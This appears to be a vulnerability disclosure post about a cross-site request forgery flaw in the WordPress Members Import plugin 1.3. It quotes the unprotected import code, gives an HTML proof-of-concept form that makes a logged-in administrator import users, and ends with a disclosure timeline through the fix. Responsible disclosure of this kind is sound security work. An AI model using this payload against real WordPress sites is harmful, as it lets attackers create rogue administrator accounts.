Recently we have been taking a quick look over plugins that handle importing users into WordPress for security issues, since their functionality could be useful to hackers.

In looking over the Members Import plugin we found that the plugin does not include protection against cross-site request forgery (CSRF) for requests to imports users, as of version 1.3. So if you could get a logged in administrator to access a page you control you could cause them to create a new user with the Administrator role that they then would have access to.

The import is handled through the page /wp-admin/users.php?page=members-import, which is set up with the following line of code in the file /members-import.php:

17

add_submenu_page( 'users.php', 'Members Import', 'Members Import', 'manage_options', 'members-import', 'memberimport_page');

That calls the function memberimport_page() in the same file to generate the page. The file upload is through that function. The code before that happens in the function checks if the user can “manage_options” (which is normally a capability that Administrators have), but doesn’t check for a nonce:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

function memberimport_page() {
 
	global $wpdb;
	// User data fields list used to differentiate with user meta
	$userdata_fields = array(
		'user_login', 'user_pass',
		'user_email', 'user_url', 'user_nicename',
		'display_name', 'user_registered', 'first_name',
		'last_name', 'nickname', 'description',
		'rich_editing', 'comment_shortcuts', 'admin_color',
		'use_ssl', 'show_admin_bar_front', 'show_admin_bar_admin',
		'role'
	);
  	if (!current_user_can('manage_options'))
		wp_die( __('You do not have sufficient permissions to access this page.') );
 
	// if the form is submitted
	if ( ( array_key_exists( 'mode', $_POST ) ) && $_POST['mode'] == 'submit' ) {
 
		$arr_rows = file($_FILES['csv_file']['tmp_name']);
		$login_username = isset( $_POST['login_username'] ) ? $_POST['login_username'] : false;
 
		$new_member_notification = isset( $_POST['new_member_notification'] ) ? $_POST['new_member_notification'] : false;

We notified the developer of the issue more than a week ago, but we have not received a response and the vulnerability has not been fixed so far.

Proof of Concept

The following proof of concept will cause users included in the uploaded CSV file to be added (their role can be specified in the CSV file), when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress. he plugin comes with sample CSV file name import.csv, which can be used when testing the proof of concept.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/users.php?page=members-import" method="POST" enctype="multipart/form-data">
<input type="hidden" name="mode" value="submit">
<input type="file" name="csv_file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• 8/29/2016 – Developer notified.
• 9/7/2016 – WordPress.org Plugin Directory notified.
• 9/7/2016 – Plugin removed from the WordPress.org Plugin Directory.
• 10/3/2016 – Version 1.4 submitted to Plugin Directory, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?